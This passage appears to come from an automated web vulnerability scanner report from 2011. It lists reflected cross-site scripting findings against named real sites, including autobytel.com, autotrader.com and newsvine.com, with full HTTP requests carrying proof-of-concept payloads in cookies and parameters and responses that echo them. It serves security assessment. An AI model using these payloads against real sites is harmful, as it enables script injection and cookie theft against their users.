Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=f76c5"%3balert(1)//f9f2c543b9c; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:54:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:54:29 GMT
Content-Length: 22208
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:54:28 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
s.prop6 = "";
           //s.prop7 = "|";
           
           //s.prop9 = "|Search Engine Optimization Project|13148";
           s.prop10 = "|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "f76c5";alert(1)//f9f2c543b9c||";
           
           s.prop14 = "my garage page|repair-cost-calculator : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "|||
...[SNIP]...

4.2084. http://www.autobytel.com/sitemap/index.cfm [BDATALIST cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /sitemap/index.cfm

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7225c"%3balert(1)//f5cfac0557e was submitted in the BDATALIST cookie. This input was echoed as 7225c";alert(1)//f5cfac0557e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sitemap/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c47225c"%3balert(1)//f5cfac0557e; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:51:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:51:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:51:52 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 51398


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c47225c";alert(1)//f5cfac0557e";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "48667D0C-FB46-9E31-A7323CA1
...[SNIP]...

4.2085. http://www.autobytel.com/sitemap/index.cfm [ENTERED_POSTAL_CODE_VCH cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /sitemap/index.cfm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 809b4"%3balert(1)//25650409ef was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 809b4";alert(1)//25650409ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sitemap/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=809b4"%3balert(1)//25650409ef; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:56:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:56:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:56:35 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 51398


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
       
               s.prop8 = "|Honda_Accord";
           
           //s.prop9 = "|Search Engine Optimization Project|13148";
           s.prop10 = "|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "809b4";alert(1)//25650409ef||";
           
           s.prop14 = "unknown : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "||||||Search Engine Optimization
...[SNIP]...

4.2086. http://www.autobytel.com/sitemap/index.cfm [PV_CT cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /sitemap/index.cfm

Issue detail

The value of the PV_CT cookie is copied into the HTML document as plain text between tags. The payload 96fe1<img%20src%3da%20onerror%3dalert(1)>47a1939aac3 was submitted in the PV_CT cookie. This input was echoed as 96fe1<img src=a onerror=alert(1)>47a1939aac3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /sitemap/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=296fe1<img%20src%3da%20onerror%3dalert(1)>47a1939aac3; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
server-error: true
Content-Length: 59086
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:52:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:52:55 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:52:54 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value 296fe1<img src=a onerror=alert(1)>47a1939aac3 cannot be converted to a number.
</h1>
...[SNIP]...

4.2087. http://www.autobytel.com/used-cars.htm [BDATALIST cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /used-cars.htm

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f53c"%3balert(1)//864a7b1dec1 was submitted in the BDATALIST cookie. This input was echoed as 3f53c";alert(1)//864a7b1dec1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /used-cars.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c43f53c"%3balert(1)//864a7b1dec1; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:48:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:48:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:48:35 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:48:35 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 79106


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c43f53c";alert(1)//864a7b1dec1";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "484871FD-C2C1-FD9F-540E5F1F
...[SNIP]...

4.2088. http://www.autobytel.com/used-cars.htm [ENTERED_POSTAL_CODE_VCH cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /used-cars.htm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c0ef"%3balert(1)//997bf3f94eb was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 5c0ef";alert(1)//997bf3f94eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /used-cars.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=5c0ef"%3balert(1)//997bf3f94eb; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:52:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:52:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:52:26 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:52:26 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 79106


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
= "usedhome|uhp";
           
           //s.prop9 = "usedhome|Search Engine Optimization Project|13148";
           s.prop10 = "usedhome|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "5c0ef";alert(1)//997bf3f94eb||";
           
           s.prop14 = "used cars page : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "usedhome|||rec|sky|ban|Sea
...[SNIP]...

4.2089. http://www.autobytel.com/x22 [BDATALIST cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /x22

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97692"%3balert(1)//3713275794b was submitted in the BDATALIST cookie. This input was echoed as 97692";alert(1)//3713275794b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /x22 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c497692"%3balert(1)//3713275794b; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 23456
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:24:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:24:49 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:24:49 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:24:49 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/


<!-- begin: fnc_getComputerName.cfm -->

<!-- end: fnc_getComputerName.cfm -->
<!-- ReferringSite: --> <!-- Referer: None --> <!--
This file creates a boxerjam cookie that expires
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c497692";alert(1)//3713275794b";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "476ECC60-90F5-9305-A2EFD2B1
...[SNIP]...

4.2090. http://www.autotrader.com/ [JSESSIONID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /

Issue detail

The value of the JSESSIONID cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5dfa9'-alert(1)-'1f3227d916 was submitted in the JSESSIONID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIRF_Audit=true; JSESSIONID=9FDC9D8306C6C65BA049C7655627ABAE5dfa9'-alert(1)-'1f3227d916; ATC_USER_ZIP=; ATC_PID=-1761786222|959219900373039673; v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; BIGipServerwww=1619582986.61475.0000; mbox=check#true#1295922044|session#1295921983404-727382#1295923844|PC#1295921983404-727382.17#1297131585;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:15:28 GMT
Server: Apache
Set-Cookie: JSESSIONID=9FDC9D8306C6C65BA049C7655627ABAE5dfa9'-alert(1)-'1f3227d916; Path=/
Set-Cookie: ATC_USER_ZIP=; Domain=.autotrader.com; Expires=Wed, 01-Feb-2012 14:15:28 GMT; Path=/
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: BIGipServerAT-Production_hhtp=3459409418.61475.0000; path=/
Content-Length: 60029


<!DOCTYPE html P
...[SNIP]...
<script type="text/javascript">
var sessionID = '9FDC9D8306C6C65BA049C7655627ABAE5dfa9'-alert(1)-'1f3227d916';
var newCarAd = '<p class="atcui-label">
...[SNIP]...

4.2091. http://www.newsvine.com/_wine/save [u parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsvine.com
Path:   /_wine/save

Issue detail

The value of the u request parameter is copied into the HTML document as plain text between tags. The payload ddaad<script>alert(1)</script>54e5082e4da was submitted in the u parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /_wine/save?u={u}ddaad<script>alert(1)</script>54e5082e4da&h={t} HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 05:03:38 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=1afd75fafa487fadf3e5e60f37cd6487; expires=Mon, 20-Jan-2031 05:03:38 GMT; path=/; domain=.newsvine.com
Location: https://www.newsvine.com/_nv/accounts/login?popoff&redirect=http%3A%2F%2Fwww.newsvine.com%2F_wine%2Fsave%3Fu%3D%7Bu%7Dddaad%3Cscript%3Ealert%281%29%3C%2Fscript%3E54e5082e4da%26h%3D%7Bt%7D
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 15749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script type="text/javascr
...[SNIP]...
<div style="width: 410px; overflow: hidden; height: 1.3em;">http://{u}ddaad<script>alert(1)</script>54e5082e4da</div>
...[SNIP]...

4.2092. http://www.newsvine.com/_wine/save [u parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsvine.com
Path:   /_wine/save

Issue detail

The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84841"><script>alert(1)</script>0d6cee6e495 was submitted in the u parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /_wine/save?u={u}84841"><script>alert(1)</script>0d6cee6e495&h={t} HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 05:03:25 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=5e60e8bada3f2a6ac8bd91e7d555bf9a; expires=Mon, 20-Jan-2031 05:03:25 GMT; path=/; domain=.newsvine.com
Location: https://www.newsvine.com/_nv/accounts/login?popoff&redirect=http%3A%2F%2Fwww.newsvine.com%2F_wine%2Fsave%3Fu%3D%7Bu%7D84841%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E0d6cee6e495%26h%3D%7Bt%7D
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 15755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script type="text/javascr
...[SNIP]...
<input type="hidden" id="saveURL" name="url" value="http://{u}84841"><script>alert(1)</script>0d6cee6e495" />
...[SNIP]...

4.2093. http://www.payloadmagazine.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.payloadmagazine.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad960"><script>alert(1)</script>a93993ab4cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?ad960"><script>alert(1)</script>a93993ab4cb=1 HTTP/1.1
Host: www.payloadmagazine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 25 Jan 2011 00:08:57 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) PHP/4.4.2-0.dotdeb.1 mod_perl/1.29
Connection: close
Location: http://www.commercialtrucktrader.com/?ad960"><script>alert(1)</script>a93993ab4cb=1
Content-Type: text/html; charset=iso-8859-1
Content-Length: 458

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML><HEAD><TITLE>www.payloadmagazine.com</TITLE>
<META NAME="keywords" CONTENT="None">
<META NAME="robots" CONTENT="index,follow">
<META NAME="descript
...[SNIP]...
<A HREF="http://www.commercialtrucktrader.com/?ad960"><script>alert(1)</script>a93993ab4cb=1">
...[SNIP]...

5. Flash cross-domain policy
There are 2 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


5.1. http://ads.doclix.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.doclix.com
